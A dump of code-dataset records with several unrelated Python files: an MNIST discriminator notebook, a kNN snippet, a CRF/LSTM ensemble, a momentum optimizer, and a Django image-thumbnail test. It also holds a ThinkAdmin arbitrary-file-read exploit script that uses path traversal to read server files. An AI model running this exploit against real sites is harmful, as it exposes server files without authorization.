"serde.field._resolve_to_field_instance", "line_number": 600, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 602, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 603, "usage_type": "call"}, {"api_name": "serde.field.create", "line_number": 608, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 610, "usage_type": "name"}, {"api_name": "serde.Model", "line_number": 615, "usage_type": "name"}, {"api_name": "serde.Model", "line_number": 626, "usage_type": "name"}, {"api_name": "serde.field.create", "line_number": 627, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 627, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 631, 
"usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 631, "usage_type": "argument"}, {"api_name": "serde.field.Field", "line_number": 634, "usage_type": "argument"}, {"api_name": "serde.field.create", "line_number": 634, "usage_type": "call"}]} +{"seq_id": "555228098", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom sklearn import preprocessing\nfrom random import shuffle\n\n\n# In[2]:\n\n\n(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()\n\n\n# In[3]:\n\n\n# plt.imshow(x_train[0], cmap=\"gray\")\nprint(\"Fish\")\n\n# In[4]:\n\n\ndef normalise_matrix(dataset):\n dataset = (dataset/255)*2 - 1\n return dataset\n\n\n# In[5]:\n\n\nx_train = normalise_matrix(x_train)\nx_test = normalise_matrix(x_test) \nplt.imshow(x_train[0], cmap=\"gray\")\n\n\n# In[6]:\n\n\ndef one_hot_encoder(labels):\n enc = preprocessing.OneHotEncoder(categories=\"auto\")\n enc.fit(labels.reshape(-1, 1))\n return enc.transform(labels.reshape(-1, 1)).toarray()\n\n\n# In[7]:\n\n\ny_train = one_hot_encoder(y_train)\ny_test = one_hot_encoder(y_test)\n\n\n# In[8]:\n\n\ny_train = np.zeros((60000, 2))\ny_train[:, 1] = 1\n\ny_test = np.zeros((10000, 2))\ny_test[:, 1] = 1\n\n\n# In[9]:\n\n\ny_train = y_train.reshape(60000, 1, 2)\ny_test = y_test.reshape(10000, 1, 2)\n\n\n# In[10]:\n\n\nx_test.shape\n\n\n# In[11]:\n\n\nfrom skimage.transform import resize\n\nx_train64 = x_train.tolist() \n\nprint(\"Training reshaping started\")\n\nfor i, image in enumerate(x_train):\n print(i)\n x_train64[i] = resize(image, (64, 64)).reshape(64, 64, 1)\n\n\nprint(\"Training reshaping ended\")\n\n# In[12]:\n\n\nnoise_train = np.random.rand(10000, 64, 64, 1) * 2 - 1\n\n\n# In[13]:\n\n\n\n\n# In[14]:\n\n\n# for ele in noise:\n# x_train64.append(ele)\n\n\n# In[15]:\n\n\n# len(x_train64)\n\n\n# In[16]:\n\n\nx_test64 = x_test.tolist() \n\nprint(\"Rshaoing x tst\")\n\nfor i, image in enumerate(x_test):\n print(i)\n x_test64[i] = resize(image, (64, 64)).reshape(64, 64,1)\n\n\n# In[17]:\n\n\nnoise_test = np.random.rand(5000, 64, 64, 1) * 2 - 1\n\n\n# In[18]:\n\n\n# noise_test = noise_test.tolist()\n\n\n# In[19]:\n\n\n# for ele in noise_test:\n# x_test64.append(ele)\n\n\n# In[20]:\n\n\n# len(x_test64)\n\n\n# In[21]:\n\nprint(\"Np_array\")\n\nx_train64 = np.asarray(x_train64)\nx_test64 = np.asarray(x_test64)\n\nprint(\"Appending noise matrix to dataset started\")\n\nx_train64 = np.append(x_train64, noise_train, axis=0)\nx_test64 = np.append(x_test64, noise_test, axis=0)\n\nprint(\"Appending noise matrix to dataset ended\")\n\n\n# In[24]:\n\n\ny_train_noise = np.zeros((10000, 2))\ny_train_noise[:, 0] = 1\n\ny_test_noise = np.zeros((5000, 2))\ny_test_noise[:, 0] = 1\n\n\n# In[25]:\n\n\ny_train_noise = y_train_noise.reshape(10000, 1, 2)\ny_test_noise = y_test_noise.reshape(5000, 1, 2)\n\n\n# In[26]:\n\n\ny_train = np.append(y_train, y_train_noise, axis=0)\ny_test = np.append(y_test, y_test_noise, axis=0)\n\n\nprint(\"eigenfish\")\n\n# In[27]:\n\n\nfrom tensorflow.contrib.layers import flatten\n\ndef DCGAN_discriminator(x):\n # Hyperparameters to be added\n mu = 0\n sigma = 0.1\n \n # Discriminator\n \n # Layer 1: Convolutional. (Random) Input = 64x64x1. 
Output = 32x32x128.\n conv1_w = tf.Variable(tf.truncated_normal(shape = [33, 33, 1, 128], mean = mu, stddev = sigma))\n conv1_b = tf.Variable(tf.zeros(128))\n conv1 = tf.nn.conv2d(x, conv1_w, strides = [1,1,1,1], padding = 'VALID') + conv1_b\n \n # Batch Normalisation\n conv1 = tf.layers.batch_normalization(conv1)\n \n # Activation layer\n conv1 = tf.nn.relu(conv1)\n \n # Layer 2: Convolutional. (Random) Input = 32x32x128. Output = 16x16x256.\n conv2_w = tf.Variable(tf.truncated_normal(shape = [17, 17, 128, 256], mean = mu, stddev = sigma))\n conv2_b = tf.Variable(tf.zeros(256))\n conv2 = tf.nn.conv2d(conv1, conv2_w, strides = [1,1,1,1], padding = 'VALID') + conv2_b\n \n # Batch Normalisation\n conv2 = tf.layers.batch_normalization(conv2)\n \n # Activation layer\n conv2 = tf.nn.relu(conv2)\n \n # Layer 3: Convolutional. (Random) Input = 16x16x256. Output = 8x8x512.\n conv3_w = tf.Variable(tf.truncated_normal(shape = [9, 9, 256, 512], mean = mu, stddev = sigma))\n conv3_b = tf.Variable(tf.zeros(512))\n conv3 = tf.nn.conv2d(conv2, conv3_w, strides = [1,1,1,1], padding = 'VALID') + conv3_b\n \n # Batch Normalisation\n conv3 = tf.layers.batch_normalization(conv3)\n \n # Activation layer\n conv3 = tf.nn.relu(conv3)\n\n # Layer 4: Convolutional. (Random) Input = 8x8x512. Output = 4x4x1024.\n conv4_w = tf.Variable(tf.truncated_normal(shape = [5, 5, 512, 1024], mean = mu, stddev = sigma))\n conv4_b = tf.Variable(tf.zeros(1024))\n conv4 = tf.nn.conv2d(conv3, conv4_w, strides = [1,1,1,1], padding = 'VALID') + conv4_b\n \n # Batch Normalisation\n conv4 = tf.layers.batch_normalization(conv4)\n \n # Activation layer\n conv4 = tf.nn.relu(conv4)\n \n conv4 = flatten(conv4)\n \n conv5_w = tf.Variable(tf.truncated_normal(shape = (16384, 2), mean = mu, stddev = sigma))\n conv5_b = tf.Variable(tf.zeros(2))\n logits = tf.matmul(conv4, conv5_w) + conv5_b\n \n# logits = flatten(conv5)\n out = tf.sigmoid(logits)\n \n return out, logits\n\n\n# In[28]:\n\n\nx = tf.placeholder(tf.float32, (None, 64, 64, 1))\ny = tf.placeholder(tf.int32, (None))\none_hot_y = tf.one_hot(y, 2)\n\n\n# In[29]:\n\n\nrate = 0.001\n\n_, logits = DCGAN_discriminator(x)\ncross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=one_hot_y, logits=logits) \nloss_operation = tf.reduce_mean(cross_entropy)\n#optimizer = tf.train.AdamOptimizer(learning_rate=rate)\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=rate)\ntraining_operation = optimizer.minimize(loss_operation)\n\n\n# In[30]:\n\n\npredictions_operation = tf.argmax(tf.nn.softmax(logits), 1)\ncorrect_prediction = tf.equal(predictions_operation, tf.argmax(y_train, 1))\naccuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nsaver = tf.train.Saver()\n\ndef evaluate(X_data, y_data):\n num_examples = len(X_data)\n total_accuracy = 0\n sess = tf.get_default_session()\n all_predictions = []\n for offset in range(0, num_examples, BATCH_SIZE):\n batch_x, batch_y = X_data[offset:offset+BATCH_SIZE], y_data[offset:offset+BATCH_SIZE]\n accuracy, predictions = sess.run([accuracy_operation, predictions_operation], feed_dict={x: batch_x, y: batch_y})\n \n all_predictions = np.hstack((all_predictions, predictions))\n total_accuracy += (accuracy * len(batch_x))\n all_predictions = np.array(all_predictions)\n return total_accuracy / num_examples, all_predictions\n\n\nprint(\"poofsure\")\n\n# In[ ]:\n\n\nEPOCHS = 3\nBATCH_SIZE = 500\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\n\nwith tf.Session(config=config) as sess:\n \n sess.run(tf.global_variables_initializer())\n num_examples = len(x_train)\n \n print(\"Training...\")\n print()\n for i in range(EPOCHS):\n np.random.shuffle(x_train64)\n np.random.shuffle(y_train)\n \n for offset in range(0, num_examples, BATCH_SIZE):\n end = offset + BATCH_SIZE\n batch_x, batch_y = x_train64[offset:end], y_train[offset:end]\n print(\"Running session\")\n sess.run(training_operation, feed_dict={x: batch_x, y: batch_y})\n \n validation_accuracy, validation_predictions = evaluate(x_test64, y_test)\n print(\"EPOCH {} ...\".format(i+1))\n print(\"Validation Accuracy = {:.3f}\".format(validation_accuracy))\n print()\n \n saver.save(sess, './lenet')\n print(\"Model saved\")", "sub_path": "coursework2/Coursework_2_quesiton_1.py", "file_name": "Coursework_2_quesiton_1.py", "file_ext": "py", "file_size_in_byte": 7309, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tensorflow.keras.datasets.mnist.load_data", "line_number": 18, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 18, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 65, "usage_type": "call"}, {"api_name": "skimage.transform.resize", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 101, "usage_type": "attribute"}, {"api_name": "skimage.transform.resize", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 137, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 195, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 213, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 213, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 214, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 214, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 215, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 215, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 218, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 218, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 221, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 221, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 224, "usage_type": "call"},
{"api_name": "tensorflow.truncated_normal", "line_number": 224, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 225, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 225, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 226, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 226, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 229, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 229, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 232, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 232, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 235, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 235, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 236, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 236, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 237, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 237, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 240, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 240, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 243, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 243, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 246, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 246, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 247, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 247, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 248, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 248, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 251, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 251, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 254, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 254, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.flatten", "line_number": 256, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 258, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 258, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 259, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 259, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 260, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 263, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 271, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 271, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 272, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 272, "usage_type": "attribute"}, {"api_name": "tensorflow.one_hot", "line_number": 273, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits", "line_number": 282, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 282, "usage_type": "attribute"}, {"api_name": 
"tensorflow.reduce_mean", "line_number": 283, "usage_type": "call"}, {"api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 285, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 285, "usage_type": "attribute"}, {"api_name": "tensorflow.argmax", "line_number": 292, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 292, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 292, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 293, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 293, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 294, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 294, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 294, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 295, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 295, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_session", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 308, "usage_type": "call"}, {"api_name": "tensorflow.ConfigProto", "line_number": 320, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 323, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 325, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 331, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 332, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 332, "usage_type": "attribute"}]} +{"seq_id": "479832399", "text": "points = np.array([1,1], [1,2], [1,3], [2,1], [2,2], [2,3], [3,1], [3,2], [3, 3])\r\np = np.array([2.5, 2])\r\n\r\ndef find_nearest_neighbours(p,points, k=5):\r\n\t\"\"\"Find the k Nearest Neighbours of point p and return their indices\"\"\"\r\n\tdistances = np.zeros(points.shape[0])\r\n\tfor i in range(len(distances)):\r\n\t\tdistances[i] = distance(p, points[i])\r\n\tind = np.argsort(distances)\r\n\treturn ind[:k]\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.plot(points[:,0], points[:,1], \"ro\")\r\nplt.plot(p[0], p[1], \"bo\")\r\nplt.axis([.5, 3.5, 0.5, 3.5])\r\n\r\ndef knn_predict(p, points, outcomes, k = 5):\r\n\tind = find_nearest_neighbours(p, points, k)\r\n\treturn majority_vote(outcomes[ind])\r\n\r\noutcomes = np.array([0,0,0,0,1,1,1,1,1])\r\nknn_predict([2.5, 2.7], points, outcomes, k=2)\r\n\r\ndef generate_synth_data(n = 50):\r\n\t\"\"\"Create two sets of point from bivariate normal distributions.\"\"\"\r\n\tnp.concatenate((ss.norm(0,1).rsv((n,2)), ss.norm(1,1).rsv((n,2))), axis = 0)\r\n\toutcomes = np.concatenate((np.repeat(0, n), np.repeat(1, n)))\r\n\treturn (points, outcomes)\r\n\r\nplt.figure()\r\nplt.plot(points[:n, 0], points[:n, 1], \"ro\")\r\nplt.plot(points[n:, 0], points[n:, 1], \"bo\")\r\nplt.savefig(\"bivardata.pdf\")\r\n", "sub_path": "kNN.py", "file_name": "kNN.py", "file_ext": "py", "file_size_in_byte": 1165, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.plot", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", 
"line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "93437117", "text": "import pickle\nfrom lib.feature import *\nfrom keras.models import load_model\nfrom sklearn_crfsuite import metrics\nfrom lib.lstmlib import *\nimport numpy as np\nfrom lib.arg import lstm_crf_arg\nfrom lib.metric import pred2text\n\nparser = lstm_crf_arg()\nargs = parser.parse_args()\ntrain_path = args.train\ntest_path = args.test\nw2v_text = args.w2v\nvec = args.vec\npred_path = args.pred\n\ncrf_k = args.ck\ndeep_k = args.lk\n\n# CRF\ncrf_test = Context(test_path, k=crf_k)\nif args.cpmi == True:\n crf_test += MutualInfo(test_path, text_file=train_path)\nif args.ctdiff == True:\n crf_test += Tdiff(test_path, text_file=train_path)\nprint(args.cmod)\ncrf = pickle.load(open(args.cmod, 'rb'))\ncrf_pred = crf.predict_prob(crf_test.X)\nunion = lambda x: [ ins for chap in x for ins in chap ]\ncrf_pred = [ ele['E'] for ele in union(crf_pred) ]\nans = union(crf_test.Y)\n\n# LSTM\ndeep_test = VecContext(test_path, k=deep_k, vec_size=50, w2v_text=w2v_text)\nmodel = load_model(args.lmod)\ndeep_pred = model.predict([deep_test.X])\n\n# ensemble\navg = lambda x, y: [ (x[i]+y[i])/2 for i in range(len(x)) ]\ncrf_deep = avg(crf_pred, deep_pred)\nlabel_crf_deep = VecContext.y2lab(crf_deep)\nlabel_deep = VecContext.y2lab(deep_pred)\nlabel_crf = VecContext.y2lab(crf_pred)\n\nprint('average:')\nprint(metrics.flat_classification_report(\n ans, label_crf_deep, labels=('I', 'E'), digits=4\n))\nprint('LSTM:')\nprint(metrics.flat_classification_report(\n ans, label_deep, labels=('I', 'E'), digits=4\n))\nprint('CRF:')\nprint(metrics.flat_classification_report(\n ans, label_crf, labels=('I', 'E'), digits=4\n))\n\nif pred_path != None:\n f = open(pred_path, 'w')\n f.write(pred2text(test_path, label_crf_deep))\n", "sub_path": "CRF+LSTM的最佳整合/lstm+crf_avg_ensemble.py", "file_name": "lstm+crf_avg_ensemble.py", "file_ext": "py", "file_size_in_byte": 1685, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "lib.arg.lstm_crf_arg", "line_number": 10, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn_crfsuite.metrics.flat_classification_report", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn_crfsuite.metrics", "line_number": 47, "usage_type": "name"}, {"api_name": "sklearn_crfsuite.metrics.flat_classification_report", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn_crfsuite.metrics", "line_number": 51, "usage_type": "name"}, {"api_name": 
"sklearn_crfsuite.metrics.flat_classification_report", "line_number": 55, "usage_type": "call"}, {"api_name": "sklearn_crfsuite.metrics", "line_number": 55, "usage_type": "name"}, {"api_name": "lib.metric.pred2text", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "200203256", "text": "from numpy import arange\nfrom theano import config\n\nfrom optimization_base import OptimizationBase\n\nfrom MISC.container import ContainerRegisterMetaClass\nfrom MISC.logger import OutputLog\n\nclass OptimizationMomentum(OptimizationBase):\n\n __metaclass__ = ContainerRegisterMetaClass\n\n def __init__(self, data_set, optimization_parameters, hyper_parameters, regularization_methods, top=50):\n super(OptimizationMomentum, self).__init__(data_set, optimization_parameters, hyper_parameters, regularization_methods, top)\n\n self.start_value = float(optimization_parameters['start_value'])\n self.end_value = float(optimization_parameters['end_value'])\n self.step = float(optimization_parameters['step'])\n\n def perform_optimization(self, training_strategy):\n\n OutputLog().write('----------------------------------------------------------')\n OutputLog().write('momentum correlations cca_correlations time\\n')\n\n hyper_parameters = self.hyper_parameters.copy()\n best_correlation = 0\n\n #Weight decay optimization\n for i in arange(self.start_value,\n self.end_value,\n self.step,\n dtype=config.floatX):\n\n hyper_parameters.momentum = i\n correlation, execution_time = self.train(training_strategy=training_strategy, hyper_parameters=hyper_parameters)\n\n if correlation > best_correlation:\n best_correlation = correlation\n self.hyper_parameters.momentum = i\n\n OutputLog().write('%f, %s, %f\\n' % (i,\n correlation,\n execution_time))\n\n OutputLog().write('----------------------------------------------------------')\n\n return True", "sub_path": "lib/Optimizations/optimization_momentum.py", "file_name": "optimization_momentum.py", "file_ext": "py", "file_size_in_byte": 1836, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "optimization_base.OptimizationBase", "line_number": 9, "usage_type": "name"}, {"api_name": "MISC.container.ContainerRegisterMetaClass", "line_number": 11, "usage_type": "name"}, {"api_name": "MISC.logger.OutputLog", "line_number": 22, "usage_type": "call"}, {"api_name": "MISC.logger.OutputLog", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 29, "usage_type": "call"}, {"api_name": "theano.config.floatX", "line_number": 32, "usage_type": "attribute"}, {"api_name": "theano.config", "line_number": 32, "usage_type": "name"}, {"api_name": "MISC.logger.OutputLog", "line_number": 41, "usage_type": "call"}, {"api_name": "MISC.logger.OutputLog", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "517906255", "text": "#!/usr/bin/env python3\n\nimport sys\nimport json\nimport base64 \nimport requests\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'\n}\n\ndef encode(num, b):\n\n \"\"\"\n 对请求的文件名进行编码\n\n :param str num: 要编码的字符\n :param int b: 编码位数\n\n :return str result,'错误原因'\n \"\"\"\n\n return ((num == 0) and \"0\") or \\\n (encode(num // b, b).lstrip(\"0\") +\n \"0123456789abcdefghijklmnopqrstuvwxyz\"[num % b])\n\ndef check(site):\n \"\"\"\n 检测是否存在漏洞\n\n :param:\n\n :return bool True or False: 是否存在漏洞\n \"\"\"\n \n try:\n file_prefix_list = ['/', 
'application/admin/../../../../../../../']\n path_name_list = ['/admin.html?s=admin/api.Update/read/', '/admin.html?s=admin/api.Update/get/encode/']\n for file_prefix in file_prefix_list:\n for path_name in path_name_list:\n payload = file_prefix + '/public/index.php'\n payload = payload.encode('utf-8')\n poc = \"\"\n for i in payload:\n poc += encode(i, 36)\n link = site + path_name + poc\n try:\n req = requests.get(link, headers = headers, verify=False)\n if req.status_code == 200:\n json_data = req.json()['data']\n if json_data:\n print(\"读取文件:/public/index.php\", \"\\n\",\"文件内容:\", \"\\n\", base64.b64decode(json_data['content']).decode())\n return True \n except Exception as e:\n print(e)\n pass\n except Exception as e:\n print(e)\n pass\n\nif __name__==\"__main__\":\n check(sys.argv[1])\n", "sub_path": "Thinkadmin_Arbitrary_File_Read.py", "file_name": "Thinkadmin_Arbitrary_File_Read.py", "file_ext": "py", "file_size_in_byte": 1859, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 51, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 55, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 65, "usage_type": "attribute"}]}
+{"seq_id": "590847787", "text": "import base64\nimport random\nfrom io import BytesIO\n\nimport SimpleITK\nimport pytest\nfrom PIL import Image as PILImage\nfrom django.conf import settings\nfrom knox.models import AuthToken\nfrom rest_framework import status\n\nfrom grandchallenge.subdomains.utils import reverse\nfrom tests.cases_tests.factories import (\n ImageFactoryWithImageFile,\n ImageFactoryWithImageFile16Bit,\n ImageFactoryWithImageFile2DLarge,\n ImageFactoryWithImageFile3DLarge3Slices,\n ImageFactoryWithImageFile3DLarge4Slices,\n)\nfrom tests.retina_api_tests.helpers import (\n client_force_login,\n get_user_from_str,\n)\n\n\n@pytest.mark.django_db\nclass TestBase64ThumbnailView:\n @pytest.mark.parametrize(\n \"user,expected_status\",\n [\n (\"anonymous\", status.HTTP_401_UNAUTHORIZED),\n (\"normal\", status.HTTP_403_FORBIDDEN),\n (\"staff\", status.HTTP_403_FORBIDDEN),\n (\"retina_user\", status.HTTP_200_OK),\n ],\n )\n def test_access_and_defaults(self, client, user, expected_status):\n image = ImageFactoryWithImageFile()\n image.permit_viewing_by_retina_users()\n url = reverse(\"retina:api:image-thumbnail\", kwargs={\"pk\": image.pk})\n user_model = get_user_from_str(user)\n kwargs = {}\n if user_model is not None and not isinstance(user_model, str):\n _, token = AuthToken.objects.create(user=user_model)\n kwargs.update({\"HTTP_AUTHORIZATION\": f\"Bearer {token}\"})\n response = client.get(url, **kwargs)\n assert response.status_code == expected_status\n\n @staticmethod\n def perform_thumbnail_request(client, image, max_dimension):\n image.permit_viewing_by_retina_users()\n kwargs = {\"pk\": image.id}\n if max_dimension != settings.RETINA_DEFAULT_THUMBNAIL_SIZE:\n kwargs.update({\"width\": max_dimension, \"height\": max_dimension})\n url = reverse(\"retina:api:image-thumbnail\", kwargs=kwargs)\n client, user_model = client_force_login(client, user=\"retina_user\")\n _, token = AuthToken.objects.create(user=user_model)\n token = f\"Bearer {token}\"\n response = client.get(url, HTTP_AUTHORIZATION=token)\n return response\n\n @staticmethod\n def get_b64_from_image(image, max_dimension, is_3d=False):\n image_sitk = image.get_sitk_image()\n image_nparray = SimpleITK.GetArrayFromImage(image_sitk)\n if is_3d:\n depth = image_sitk.GetDepth()\n assert depth > 0\n # Get center slice of 3D image\n image_nparray = image_nparray[depth // 2]\n\n image_pil = PILImage.fromarray(image_nparray)\n image_pil.thumbnail((max_dimension, max_dimension), PILImage.ANTIALIAS)\n buffer = BytesIO()\n image_pil.save(buffer, format=\"png\")\n image_base64_str = base64.b64encode(buffer.getvalue())\n return image_base64_str\n\n def do_test_thumbnail_creation(\n self, client, max_dimension, image, is_3d=False\n ):\n response = self.perform_thumbnail_request(client, image, max_dimension)\n\n assert response.status_code == status.HTTP_200_OK\n image_base64_str = self.get_b64_from_image(image, max_dimension, is_3d)\n\n returned_img = PILImage.open(\n BytesIO(base64.b64decode(response.json()[\"content\"]))\n )\n assert response.json()[\"content\"] == image_base64_str.decode()\n width, height = returned_img.size\n assert max(width, height) == max_dimension\n\n @pytest.mark.parametrize(\n \"is_3d,image_factory\",\n [\n (False, ImageFactoryWithImageFile2DLarge),\n (True, ImageFactoryWithImageFile3DLarge3Slices),\n (True, ImageFactoryWithImageFile3DLarge4Slices),\n ],\n )\n 